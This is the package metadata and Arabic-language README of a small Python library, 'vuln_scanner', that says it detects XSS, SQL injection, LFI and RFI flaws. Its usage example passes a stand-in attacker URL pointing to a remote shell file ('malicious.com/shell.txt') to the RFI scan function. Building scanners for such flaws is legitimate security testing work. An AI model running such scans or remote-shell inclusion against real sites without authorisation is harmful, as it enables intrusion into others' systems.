Metadata-Version: 2.1
Name: vuln_scanner
Version: 0.3
Summary: مكتبة للكشف عن ثغرات XSS، SQL Injection، LFI، و RFI
Home-page: https://github.com/AL-MHIB
Author: ALMHEB
Author-email: appasqw107@gmail.com
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Requires-Python: >=3.6
Description-Content-Type: text/markdown
License-File: LICENSE.txt

# vuln_scanner

مكتبة بايثون لاكتشاف الثغرات الشائعة مثل XSS، SQL Injection، LFI، و RFI.

## الاستخدام

```python
from vuln_scanner import scan_xss, scan_sql_injection, scan_lfi, scan_rfi

url = "http://example.com"
external_url = "http://malicious.com/shell.txt"

scan_xss(url)
scan_sql_injection(url)
scan_lfi(url)
scan_rfi(url, external_url)
